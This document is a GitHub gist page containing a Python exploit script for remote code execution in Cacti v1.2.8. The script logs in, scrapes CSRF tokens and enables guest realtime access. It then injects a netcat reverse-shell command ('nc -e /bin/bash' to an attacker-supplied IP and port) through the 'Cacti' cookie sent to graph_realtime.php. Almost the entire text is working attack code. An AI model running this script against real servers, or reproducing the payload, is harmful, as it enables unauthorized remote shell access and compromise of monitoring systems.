This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python3 | |
| # Exploit Title: Cacti v1.2.8 Remote Code Execution | |
| # Date: 03/02/2020 | |
| # Exploit Author: Askar (@mohammadaskar2) | |
| # Vendor Homepage: https://cacti.net/ | |
| # Version: v1.2.8 | |
| # Tested on: CentOS 7.3 / PHP 7.1.33 | |
| import requests | |
| import sys | |
| import warnings | |
| from bs4 import BeautifulSoup | |
| from urllib.parse import quote | |
| warnings.filterwarnings("ignore", category=UserWarning, module='bs4') | |
| if len(sys.argv) != 6: | |
| print(len(sys.argv)) | |
| print("[~] Usage : ./Cacti-exploit.py url username password ip port") | |
| exit() | |
| url = sys.argv[1] | |
| username = sys.argv[2] | |
| password = sys.argv[3] | |
| ip = sys.argv[4] | |
| port = sys.argv[5] | |
| def login(token): | |
| login_info = { | |
| "login_username": username, | |
| "login_password": password, | |
| "action": "login", | |
| "__csrf_magic": token | |
| } | |
| login_request = request.post(url+"/index.php", login_info) | |
| login_text = login_request.text | |
| if "Invalid User Name/Password Please Retype" in login_text: | |
| return False | |
| else: | |
| return True | |
| def enable_guest(token): | |
| request_info = { | |
| "id": "3", | |
| "section25": "on", | |
| "section7": "on", | |
| "tab": "realms", | |
| "save_component_realm_perms": 1, | |
| "action": "save", | |
| "__csrf_magic": token | |
| } | |
| enable_request = request.post(url+"/user_admin.php?header=false", request_info) | |
| if enable_request: | |
| return True | |
| else: | |
| return False | |
| def send_exploit(): | |
| payload = ";nc${IFS}-e${IFS}/bin/bash${IFS}%s${IFS}%s" % (ip, port) | |
| cookies = {'Cacti': quote(payload)} | |
| requests.get(url+"/graph_realtime.php?action=init", cookies=cookies) | |
| request = requests.session() | |
| print("[+]Retrieving login CSRF token") | |
| page = request.get(url+"/index.php") | |
| html_content = page.text | |
| soup = BeautifulSoup(html_content, "html5lib") | |
| token = soup.findAll('input')[0].get("value") | |
| if token: | |
| print("[+]Token Found : %s" % token) | |
| print("[+]Sending creds ..") | |
| login_status = login(token) | |
| if login_status: | |
| print("[+]Successfully LoggedIn") | |
| print("[+]Retrieving CSRF token ..") | |
| page = request.get(url+"/user_admin.php?action=user_edit&id=3&tab=realms") | |
| html_content = page.text | |
| soup = BeautifulSoup(html_content, "html5lib") | |
| token = soup.findAll('input')[1].get("value") | |
| if token: | |
| print("[+]Making some noise ..") | |
| guest_realtime = enable_guest(token) | |
| if guest_realtime: | |
| print("[+]Sending malicous request, check your nc ;)") | |
| send_exploit() | |
| else: | |
| print("[-]Error while activating the malicous account") | |
| else: | |
| print("[-] Unable to retrieve CSRF token from admin page!") | |
| exit() | |
| else: | |
| print("[-]Cannot Login!") | |
| else: | |
| print("[-] Unable to retrieve CSRF token!") | |
| exit() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment